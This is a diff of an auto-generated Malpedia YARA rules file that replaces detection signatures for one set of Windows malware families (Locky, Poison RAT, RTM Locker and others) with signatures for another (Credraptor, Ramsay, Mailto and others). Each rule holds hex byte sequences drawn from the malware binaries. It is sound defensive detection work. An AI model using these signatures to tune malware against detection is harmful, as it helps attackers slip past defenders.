+		logic_hash = "83ca7d457445609b911357175ebed2dd8acc41dfcf066ffda805bb2cf527d439"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -124056,34 +123956,34 @@ rule MALPEDIA_Win_Darkvnc_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 428994817c120000 48638178540000 891481 ff8178540000 c3 8bc2 41b2ff }
-		$sequence_1 = { 81f9f4010000 7265 488bd5 898708030000 488bcf e8???????? 488b4768 }
-		$sequence_2 = { 4c8bc1 ebdd 81fba3000000 0f8583000000 33d2 488bcf ff15???????? }
-		$sequence_3 = { 4c8bf9 4889b5b8020000 4889bdc0020000 488d1508df0000 488d4d00 33ff 4d8be1 }
-		$sequence_4 = { 488d542420 488bcf e8???????? 8bd8 488b0d???????? 4c8bc7 33d2 }
-		$sequence_5 = { 740c 498bd7 488bcb ff15???????? 4d85f6 740c }
-		$sequence_6 = { f645e801 7425 8b8f80000000 85c9 0f94c0 a801 7436 }
-		$sequence_7 = { e9???????? 488b442448 4889442460 488b442460 4863403c 488b4c2460 4803c8 }
-		$sequence_8 = { 83caff ff15???????? 488d55e0 488bcb e8???????? 488b8be8070000 ff15???????? }
-		$sequence_9 = { 4889842480000000 4883bc24800000000d 0f874b070000 488d0577f9feff 488b8c2480000000 8b8c88dc0d0100 }
+		$sequence_0 = { 4885c9 7405 e8???????? 4883631000 48c743180f000000 c60300 4883c320 }
+		$sequence_1 = { e8???????? 488b4810 4883781810 7203 488b00 4885c9 7425 }
+		$sequence_2 = { 4c89b5a0010000 4c89bda8010000 4488b590010000 48399dc8010000 7211 488b8db0010000 4885c9 }
+		$sequence_3 = { 4c89742430 4c89742440 48c74424480f000000 41b814000000 488d15deaf0500 488d4c2430 e8???????? }
+		$sequence_4 = { 4c8b43f8 4d85c0 742b 4883c8ff 48ffc0 44382407 75f7 }
+		$sequence_5 = { 4c8b32 492bee 488bc5 48c1f803 480fafc1 4885ed 7473 }
+		$sequence_6 = { 488d542420 488bce e8???????? 90 eb2b 4c892e 41be0f000000 }
+		$sequence_7 = { 57 4883ec40 488360f000 488bf1 83601800 488d0da9db0700 8bda }
+		$sequence_8 = { e9???????? 83fa06 0f8553010000 8d7209 443821 742e 4c8965e0 }
+		$sequence_9 = { eb05 448974246c 4889b580020000 4889b590020000 4889bd98020000 41b823000000 488d1537f50700 }
 
 	condition:
-		7 of them and filesize < 606208
+		7 of them and filesize < 1949696
 }
-rule MALPEDIA_Win_Redpepper_Auto : FILE
+rule MALPEDIA_Win_R980_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d2edfb9a-1eb5-5a85-952d-b05e4e2a71cd"
+		id = "93137b54-f6ba-5cf4-a0be-8189c2bb31ee"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.redpepper"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.redpepper_auto.yar#L1-L113"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.r980"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.r980_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "e96cef7dbcd0aadec344d24829840e1785ca6a9324f588db92d46f4ddb824ac9"
+		logic_hash = "fbf84b1263b8ff37213624bd208f7542a2b35e24d52f97dbbecc6762e2858308"
 		score = 75
-		quality = 75
+		quality = 45
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -124095,34 +123995,34 @@ rule MALPEDIA_Win_Redpepper_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 68???????? 6a15 8d562c 6aff }
-		$sequence_1 = { 8b500c 41 83f904 8b12 8a540aff }
-		$sequence_2 = { 7405 e8???????? 8bc7 5f c9 }
-		$sequence_3 = { 8b460c 85c0 7432 8b442420 }
-		$sequence_4 = { 8b450c 2bc7 50 8d041f }
-		$sequence_5 = { 6a01 8bcf 8bd8 e8???????? ff75fc }
-		$sequence_6 = { 6a65 6a20 e8???????? 83c428 8bc5 }
-		$sequence_7 = { 3c0a 741e 8365f800 3c0d 7503 895df8 3b750c }
-		$sequence_8 = { 83c404 85c0 7411 8b4c2418 5f }
-		$sequence_9 = { 8d85b4feffff 50 56 ff15???????? 56 }
+		$sequence_0 = { 83c40c e9???????? a900040000 0f84b0000000 837f1408 7204 8b07 }
+		$sequence_1 = { 8bc8 e8???????? 8d45d8 50 8d8d38ffffff e8???????? ff7524 }
+		$sequence_2 = { e8???????? 8b75e0 83c414 83fe03 7707 ff24b5c8ba4000 e8???????? }
+		$sequence_3 = { ff5004 c745fc07000000 8b7510 85f6 741e 8bc3 f00fc14604 }
+		$sequence_4 = { 68???????? e8???????? 51 6a20 50 8d8df0f9ffff c645fc04 }
+		$sequence_5 = { 33c1 8944960c 8b44241c 8b8810010000 8b8014010000 8d0c88 8d4204 }
+		$sequence_6 = { c60100 e8???????? e8???????? 8d942490000000 b9???????? e8???????? 8d842490000000 }
+		$sequence_7 = { 722c 8b4640 8945a4 8d0c38 894e40 8b4630 8945ac }
+		$sequence_8 = { 8bcf e8???????? 8a00 8806 834710ff 7509 c7470c00000000 }
+		$sequence_9 = { 68???????? 8d45b4 c745ac0f000000 50 c745a800000000 c6459800 e8???????? }
 
 	condition:
-		7 of them and filesize < 2482176
+		7 of them and filesize < 3178496
 }
-rule MALPEDIA_Win_Grease_Auto : FILE
+rule MALPEDIA_Win_Silon_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ecfbbfe9-c011-518f-ab9d-ed514af53077"
+		id = "77f22f8e-9f0a-5d81-b5cb-4a1b2cbd5d10"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.grease"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.grease_auto.yar#L1-L234"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.silon"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.silon_auto.yar#L1-L114"
 		license_url = "N/A"
-		logic_hash = "7c8c14c35a0def9c37a4dcb1634bd39b69466704a6828c5b8b5cd9c96e04b3c0"
+		logic_hash = "7b66629e0b9d8daa583e325d7e0da1ae5ba2cceda52e365df066a9ac5301a777"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -124134,128 +124034,116 @@ rule MALPEDIA_Win_Grease_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 52 50 683f000f00 50 50 50 }
-		$sequence_1 = { 4053 4881ec90020000 488b05???????? 4833c4 4889842480020000 488d4c2472 }
-		$sequence_2 = { 4889442438 48897c2430 4533c0 c74424283f000f00 897c2420 ff15???????? 85c0 }
-		$sequence_3 = { 895c2420 ff15???????? 85c0 0f85e7000000 }
-		$sequence_4 = { 488b4c2460 ff15???????? b801000000 488b8c2480020000 4833cc e8???????? 4881c490020000 }
-		$sequence_5 = { 4533c0 488bd3 c744242804000000 4889442420 ff15???????? 488b4c2450 ff15???????? }
-		$sequence_6 = { 85c0 0f85e7000000 488b4c2460 488d442458 }
-		$sequence_7 = { 488d542470 41b93f000f00 4533c0 48c7c102000080 }
-		$sequence_8 = { 85c0 7534 488b4c2450 488d442458 41b904000000 4533c0 }
-		$sequence_9 = { 51 6a04 53 68???????? 52 895c2430 ffd5 }
-		$sequence_10 = { 68???????? 52 e8???????? 83c40c 8d84242c040000 55 50 }
-		$sequence_11 = { c644342064 e9???????? c644342070 e9???????? c644342073 e9???????? }
-		$sequence_12 = { 51 56 66899c2440010000 66899c2446010000 66c784244a0100000700 }
-		$sequence_13 = { e9???????? c644340c79 e9???????? c644340c77 e9???????? c644340c76 }
-		$sequence_14 = { 8d442424 8d5001 8a08 83c001 }
-		$sequence_15 = { 66899c2440010000 66899c2446010000 66899c244a010000 66899c244c010000 }
-		$sequence_16 = { 68???????? 52 e8???????? 83c408 8d442414 50 }
-		$sequence_17 = { 83c408 8d442410 50 681f000200 53 8d4c2430 }
-		$sequence_18 = { 6a00 50 c684241401000000 e8???????? 0fbe4c2410 56 }
-		$sequence_19 = { c684342406000040 eb62 c68434240600007b eb58 }
-		$sequence_20 = { 8dbc24490c0000 899424400c0000 be???????? f3ab 66ab }
-		$sequence_21 = { eb3d c6440c0c3c eb36 c6440c0c28 eb2f c6440c0c24 eb28 }
-		$sequence_22 = { 8d442414 6a04 50 6a04 55 68???????? 51 }
+		$sequence_0 = { 51 8b956cfeffff 52 e8???????? 83c40c 837d8400 }
+		$sequence_1 = { 898858080000 eb7c 8b55fc 8b8254080000 898514efffff }
+		$sequence_2 = { 83c404 8945a4 837da400 746e 8b55a8 }
+		$sequence_3 = { 0f868f000000 833d????????00 0f8482000000 c745e400000000 }
+		$sequence_4 = { 50 6a00 e8???????? 83c410 89856cfeffff 83bd6cfeffff00 }
+		$sequence_5 = { 8d8de8f9ffff 51 68???????? 8d95e8fbffff }
+		$sequence_6 = { 8b55fc 8b8254080000 8b4dfc 03815c080000 }
+		$sequence_7 = { 83c410 6a65 a1???????? 50 }
+		$sequence_8 = { 8b85c4feffff 8945d4 0fb74dcd 85c9 7e34 0fb755cd }
+		$sequence_9 = { 681d5b931f 6a05 e8???????? 8945fc 8b4510 50 }
 
 	condition:
-		7 of them and filesize < 278528
+		7 of them and filesize < 122880
 }
-rule MALPEDIA_Win_Locky_Auto : FILE
+rule MALPEDIA_Win_Sysget_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9434ac8a-f19d-5097-9718-4e0bcd7c3bb7"
-		date = "2024-10-31"
-		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.locky"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.locky_auto.yar#L1-L181"
+		id = "d2f0576d-1441-54f4-9c7c-cf1f813e0f5e"
+		date = "2026-01-05"
+		modified = "2026-01-06"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sysget"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.sysget_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "cfd0780ce81a27b30c6ff7ba29e871c926663b6bd8e9b266836319c43aec3bb1"
+		logic_hash = "089522db1c40ede3965799cc3ef7759b59f64889024e8b66531171fe0f366f21"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20241030"
-		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
-		malpedia_version = "20241030"
+		malpedia_rule_date = "20260105"
+		malpedia_hash = "19b79e7cab4eaf532122e5b45a77dd8f6bb5cc79"
+		malpedia_version = "20251219"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 51 51 8b00 6a00 8d4d0c 51 ff750c }
-		$sequence_1 = { 760a 68???????? e8???????? a1???????? 2b05???????? 6a1c }
-		$sequence_2 = { 50 c745f8???????? e8???????? 8d85f0fdffff 50 }
-		$sequence_3 = { 99 83e207 8d3c02 33d2 42 c1ff03 663bca }
-		$sequence_4 = { 99 5e f7fe 8bf0 81fe48922409 760a 68???????? }
-		$sequence_5 = { 6a00 ff15???????? 85c0 751e ff15???????? c745f8???????? }
-		$sequence_6 = { 8907 8bc7 c9 c20400 ff15???????? 8945fc }
-		$sequence_7 = { 7314 8b4e1c 8b431c 3bc8 7c0a }
-		$sequence_8 = { 5b c21000 e9???????? 8bff 55 8bec 56 }
-		$sequence_9 = { 03d8 8b442408 f7e1 03d3 5b c21000 e9???????? }
-		$sequence_10 = { 66ab e9???????? 8d12 e9???????? }
-		$sequence_11 = { ebcf 90 8d36 90 }
-		$sequence_12 = { 5e c21000 8bff 55 8bec 33c0 8b4d08 }
-		$sequence_13 = { 6a61 e9???????? 90 58 }
-		$sequence_14 = { 6a63 e9???????? 90 8d36 }
-		$sequence_15 = { 66ab e9???????? 58 90 e9???????? 90 }
-		$sequence_16 = { 66ab 90 e9???????? 8d00 }
+		$sequence_0 = { e8???????? bf???????? 83c424 c60000 }
+		$sequence_1 = { 668b08 83c002 6685c9 75f5 8dbdecf1ffff 2bc6 83ef02 }
+		$sequence_2 = { 8325????????00 5e c3 55 8bec 83ec34 a1???????? }
+		$sequence_3 = { 8985c4f9ffff 052c010000 50 e8???????? 83c40c 6800800000 }
+		$sequence_4 = { a3???????? 57 6a11 59 6a7c 8d4580 }
+		$sequence_5 = { 8d85fcf7ffff 50 e8???????? 59 33c0 }
+		$sequence_6 = { 8b85f8fbffff 8d8df4fbffff 51 50 8d85fcfbffff }
+		$sequence_7 = { 8b35???????? 57 6a10 58 50 6a01 }
+		$sequence_8 = { ff15???????? 8bc6 8bd6 668b08 83c002 663bcb }
+		$sequence_9 = { 8d853cffffff 50 ff35???????? ff15???????? a1???????? }
 
 	condition:
-		7 of them and filesize < 1122304
+		7 of them and filesize < 352256
 }
-rule MALPEDIA_Win_Unidentified_089_Auto : FILE
+rule MALPEDIA_Win_Ramsay_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f61e4a77-808b-5e07-801b-03e57ce838b5"
-		date = "2023-07-11"
-		modified = "2023-07-15"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_089"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_089_auto.yar#L1-L98"
+		id = "591a738b-88c1-5449-9137-a45c1c5654e9"
+		date = "2026-01-05"
+		modified = "2026-01-06"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ramsay"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ramsay_auto.yar#L1-L162"
 		license_url = "N/A"
-		logic_hash = "f9666eb88fbd91e0eb2e4b4c8812230b36d73d66192fed407aecfaa8f0ed362a"
+		logic_hash = "cc560e807fba4f127cf57dd3774af95181c3332f30b4eada50d5d158e9717780"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20230705"
-		malpedia_hash = "42d0574f4405bd7d2b154d321d345acb18834a41"
-		malpedia_version = "20230715"
+		malpedia_rule_date = "20260105"
+		malpedia_hash = "19b79e7cab4eaf532122e5b45a77dd8f6bb5cc79"
+		malpedia_version = "20251219"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 889dd4feffff 899d84feffff 898588feffff 889d74feffff 33c0 }
-		$sequence_1 = { 8b4508 e8???????? c20c00 e8???????? cc 6a30 }
-		$sequence_2 = { f2e9e3000000 55 8bec eb0d ff7508 e8???????? }
-		$sequence_3 = { 83f904 0f8582000000 8b75d0 8bfb }
-		$sequence_4 = { eb0f ff7634 57 ff562c }
-		$sequence_5 = { 88041e 880c1f 0fb6041e 8b4dfc 03c2 8b550c }
-		$sequence_6 = { 3dffffff7f 0f87a2000000 03c0 3d00100000 7227 }
-		$sequence_7 = { 56 6a01 8d4dec 8975d8 }
+		$sequence_0 = { 7514 ff15???????? 83f820 7502 eb07 }
+		$sequence_1 = { ff15???????? 85c0 7502 eb02 ebb1 }
+		$sequence_2 = { 85c0 744c c745e800000000 eb09 8b45e8 83c001 }
+		$sequence_3 = { 8b4d08 83c101 51 6a00 8b55f8 }
+		$sequence_4 = { 85c0 751a 8b4df8 51 ff15???????? 8b55fc }
+		$sequence_5 = { 8b5508 8b4508 8a481c 884a0b 8b5508 8b4508 }
+		$sequence_6 = { 837de806 7d34 8b4d08 034de8 0fbe4101 }
+		$sequence_7 = { 884a01 ebbd b801000000 8b4df8 33cd e8???????? }
+		$sequence_8 = { e8???????? 83c404 8945f8 8b45f8 8945fc 8b4d0c }
+		$sequence_9 = { 8955e8 eba5 8b45f4 8be5 }
+		$sequence_10 = { ff15???????? 33c0 e9???????? e8???????? 85c0 }
+		$sequence_11 = { 488d8c24ec040000 ff15???????? 4885c0 7415 488b8c2420090000 }
+		$sequence_12 = { 488d8c24f0020000 e8???????? 4889842420050000 8b842420050000 }
+		$sequence_13 = { 488d8c24f0010000 ff15???????? 488d8c24f0010000 ff15???????? }
+		$sequence_14 = { 488d8c24ec040000 ff15???????? 85c0 7402 }
+		$sequence_15 = { 488d8c24f0010000 ff15???????? 4898 488d84047e040000 }
 
 	condition:
-		7 of them and filesize < 389120
+		7 of them and filesize < 2031616
 }
-rule MALPEDIA_Win_Poison_Rat_Auto : FILE
+rule MALPEDIA_Win_Fk_Undead_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7c6f2ea3-14d0-5bd3-b5de-002b01a6e4ac"
+		id = "cf4f13f3-5cfd-52f4-9402-53feb1040423"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.poison_rat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.poison_rat_auto.yar#L1-L113"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fk_undead"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.fk_undead_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "3e3b3a6380a6de226db390b398cafc3338e9d953c2f6c73b523494bf22932b99"
+		logic_hash = "082cbaea4a68893ab74100ece6602c4f221f464c059db4c166d2438647300475"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -124269,32 +124157,32 @@ rule MALPEDIA_Win_Poison_Rat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { f3ab 6810270000 8d8dc4d5ffff 6a01 }
-		$sequence_1 = { 83e61f 8b048580c54000 8b04f0 83f8ff }
-		$sequence_2 = { 33f3 8bf9 8930 8bf1 c1ef10 c1e908 }
-		$sequence_3 = { 33d7 8b7c2414 c1ef18 8b3cbd30984000 }
-		$sequence_4 = { 8ac8 80c120 888840b34000 eb1f 83f861 }
-		$sequence_5 = { 8bd3 c1ea18 c1ed10 8b149530984000 }
-		$sequence_6 = { 331c9530984000 8bd7 81e2ff000000 331c9530a44000 8b10 }
-		$sequence_7 = { 8bd9 c1eb18 895c2420 8bdf 8b7c2420 c1eb10 }
-		$sequence_8 = { 8a6e08 8a4e09 c1e108 0bca 33d2 8a560b }
-		$sequence_9 = { 330c9530a04000 8bd5 81e2ff000000 81e3ff000000 c1ed18 }
+		$sequence_0 = { 80bbbb02000000 0f44f9 83f807 0f87cb020000 ff2485887a0310 ff4618 }
+		$sequence_1 = { 8965f0 8b4508 8b750c 8b5510 33c9 898dd8f7ffff 894dfc }
+		$sequence_2 = { 83bb2402000000 745a 6a0a ff37 68???????? e8???????? 83c40c }
+		$sequence_3 = { 8bf0 6a02 6a02 56 ff15???????? c745fc00000000 56 }
+		$sequence_4 = { 6a3a ff37 e8???????? 8bf0 83c408 85f6 0f84b7000000 }
+		$sequence_5 = { 742d 8b94241c080000 8b442408 8b8c2420080000 8902 8b1424 8b842424080000 }
+		$sequence_6 = { 8b4c241c 52 8908 e8???????? 8b442418 83c404 5e }
+		$sequence_7 = { 0fb7780c 8b442428 8d5001 8a08 40 84c9 75f9 }
+		$sequence_8 = { 8b6c2414 33c0 33d2 57 89442408 85ed 0f8402010000 }
+		$sequence_9 = { 51 e8???????? 83c404 8903 85c0 7516 8b5500 }
 
 	condition:
-		7 of them and filesize < 101688
+		7 of them and filesize < 1418240
 }
-rule MALPEDIA_Win_Grabbot_Auto : FILE
+rule MALPEDIA_Win_Credraptor_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "73c12bd4-295c-5729-9e60-823ca8abaa15"
+		id = "38da88b1-241e-5356-be41-ccd7d9b62617"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.grabbot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.grabbot_auto.yar#L1-L168"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.credraptor"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.credraptor_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "c79f2285c80f8ba1c50729904e8ec53f7fa2031a70a10d12a2683fdce4ed7a23"
+		logic_hash = "0cde833c9a51e3ab99821592757d4fd144febcb8863fef5eac3bf6a67840a9e9"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -124308,38 +124196,32 @@ rule MALPEDIA_Win_Grabbot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83f85a 770b 83f841 7206 83c020 0fb7c0 83c202 }
-		$sequence_1 = { 83f85a 770d 83f841 7208 83c020 }
-		$sequence_2 = { 50 6a04 ff75e8 ff75dc }
-		$sequence_3 = { 813850450000 7523 0fb75004 bb64860000 663bd3 7506 }
-		$sequence_4 = { b905000000 3907 7707 83c704 e2f7 }
-		$sequence_5 = { 663907 7566 8b473c 03c7 813850450000 }
-		$sequence_6 = { c3 68d0035c09 e8???????? 50 e8???????? ffe0 }
-		$sequence_7 = { e8???????? 59 81c480000000 50 8bf1 e8???????? e8???????? }
-		$sequence_8 = { 56 ffd0 33c9 66894c37fe }
-		$sequence_9 = { 7428 8b0d???????? 8908 8b0d???????? 894804 8b0d???????? }
-		$sequence_10 = { 894808 8b0d???????? 89480c e9???????? 33c0 }
-		$sequence_11 = { 8d45f0 99 52 50 8b451c 99 }
-		$sequence_12 = { 57 8d7c000c 57 e8???????? }
-		$sequence_13 = { e8???????? 85c0 56 0f9fc3 e8???????? 83c414 }
-		$sequence_14 = { 50 ff15???????? a3???????? 85c0 7505 83c8ff }
-		$sequence_15 = { 8bf0 85f6 741d 8d4601 }
+		$sequence_0 = { 8b4720 83c40c 837e4000 89558c 8945c0 894db8 0f85c9120000 }
+		$sequence_1 = { e8???????? 83c40c e9???????? 837f3000 7415 8b5508 52 }
+		$sequence_2 = { e8???????? 83c404 8b5dfc 5e 8b4d0c 51 8bc3 }
+		$sequence_3 = { e9???????? a802 7508 83c8ff e9???????? 8b45f0 85c0 }
+		$sequence_4 = { c6043b25 03da ddd9 ddd8 8b4d94 41 803900 }
+		$sequence_5 = { c745dc377f0682 c745e0002de218 884de9 8855ea 8845eb 3bc7 750e }
+		$sequence_6 = { c70353000000 b802000000 5b 5d c3 83f83e 7510 }
+		$sequence_7 = { be???????? 8d4ddc 8a01 3a06 751a 84c0 7412 }
+		$sequence_8 = { c1f812 0cf0 0fb6c8 51 8bce e8???????? 8bd3 }
+		$sequence_9 = { e8???????? ff45e4 83c404 83c318 8945f0 85c0 74e0 }
 
 	condition:
-		7 of them and filesize < 1335296
+		7 of them and filesize < 1728512
 }
-rule MALPEDIA_Win_Turian_Auto : FILE
+rule MALPEDIA_Win_Mailto_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "55f5d82f-afb8-5814-b531-1c9c01e3bde2"
+		id = "ff9d1a8b-72b0-54b9-b1c0-036aa2d1956d"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.turian"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.turian_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mailto"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mailto_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "91e36be52281255f5afb4546bb919f97cb536e7671085e0b38ecf9a977103ea1"
+		logic_hash = "74f6ff054191d80b386ecb2515d44043acc73f0e2a8bfe9bc33853bab8856df0"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -124353,32 +124235,32 @@ rule MALPEDIA_Win_Turian_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 5b 81c420040000 c3 8d442410 6a10 50 }
-		$sequence_1 = { 33db 3bc3 7519 668b44240c 881d???????? 891d???????? }
-		$sequence_2 = { 5e c3 8bc8 57 c1e105 }
-		$sequence_3 = { 85c0 0f840affffff 5f 5e 5d 33c0 }
-		$sequence_4 = { 83c9ff 33c0 668b15???????? f2ae }
-		$sequence_5 = { 8d4c2410 51 e8???????? 8bbc24a0000000 83c404 a1???????? }
-		$sequence_6 = { 51 52 ffd5 85c0 7423 a1???????? 43 }
-		$sequence_7 = { 83f810 7e6a 6a00 57 53 }
-		$sequence_8 = { 56 57 730c 5f }
-		$sequence_9 = { 8b442414 50 ffd7 56 ff15???????? 83c404 33c0 }
+		$sequence_0 = { 57 e8???????? 56 ffb42498050000 8d8424e8010000 50 }
+		$sequence_1 = { 8bce d1ee 83e101 f7d9 81e12083b8ed 33ce 8bd1 }
+		$sequence_2 = { 7434 a1???????? 8d048504000000 50 ff35???????? e8???????? 83c408 }
+		$sequence_3 = { b938000000 8d3c32 2bca 33c0 8bd1 c1e902 f3ab }
+		$sequence_4 = { 47 ff742418 897c2420 6a03 e8???????? 8bf0 }
+		$sequence_5 = { 83c614 ff36 e8???????? 83c404 8d7620 83ed01 75ee }
+		$sequence_6 = { 8d4010 0f104406f0 660fefc1 0f1140f0 83e901 75eb }
+		$sequence_7 = { 6a00 6a02 ffd0 85c0 0f8517020000 53 55 }
+		$sequence_8 = { 0f1f4000 8b840c54030000 01440c0c 8b840c58030000 11440c10 8b840c5c030000 01440c14 }
+		$sequence_9 = { d1ea 83e101 f7d9 81e12083b8ed 33ca 8bd1 d1e9 }
 
 	condition:
-		7 of them and filesize < 645120
+		7 of them and filesize < 180224
 }
-rule MALPEDIA_Win_Rtm_Locker_Auto : FILE
+rule MALPEDIA_Win_Mangzamel_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c193efe6-e068-5098-a7d3-9f677c141047"
+		id = "eb9c7043-77a1-5f0e-9ec6-79bacd6f6a15"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rtm_locker"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.rtm_locker_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mangzamel"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mangzamel_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "2e6ca0dcb3b2e786645310d69deee5d15ea048d4739b56fdd6e98df960bfefa8"
+		logic_hash = "1febff50405236297e35d0651b3a25a3fa9330c560b764c64ec02cac2724b444"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -124392,34 +124274,34 @@ rule MALPEDIA_Win_Rtm_Locker_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 50 ffd7 8b44241c 8d542410 52 8d542424 c744241400000000 }
-		$sequence_1 = { 8bbd38ffffff 33d0 c1c210 03ca 33f1 c1c60c }
-		$sequence_2 = { 0f29a424b0000000 660fd4c1 0f28e2 0f29b42410010000 660f62e0 660f6ad0 }
-		$sequence_3 = { 8d85e8feffff 50 6a00 ff15???????? 85c0 7440 68???????? }
-		$sequence_4 = { 8d8550fcffff 50 8d95c8feffff 8d8d68ffffff e8???????? 83c404 8d8d68ffffff }
-		$sequence_5 = { 0f1195ecfdffff 0f119dfcfdffff 0f11a50cfeffff 0f11851cfeffff 660f1f440000 8b840d2cfeffff 01840d64fcffff }
-		$sequence_6 = { 57 660f1f440000 3a1a 7403 42 }
-		$sequence_7 = { 0f108560feffff 0f118570fdffff 0f108570feffff 0f118580fdffff e8???????? 8d8d30feffff e8???????? }
-		$sequence_8 = { 894590 33fe c1c708 8d040f 8945ec 33c2 }
-		$sequence_9 = { 8b4dec 48 897dfc 897db8 894508 85c0 0f8f3ffeffff }
+		$sequence_0 = { 8bce e8???????? 8b45dc 33ff 85c0 }
+		$sequence_1 = { e8???????? 8d8564ffffff c745e40d011133 50 e8???????? 83c428 40 }
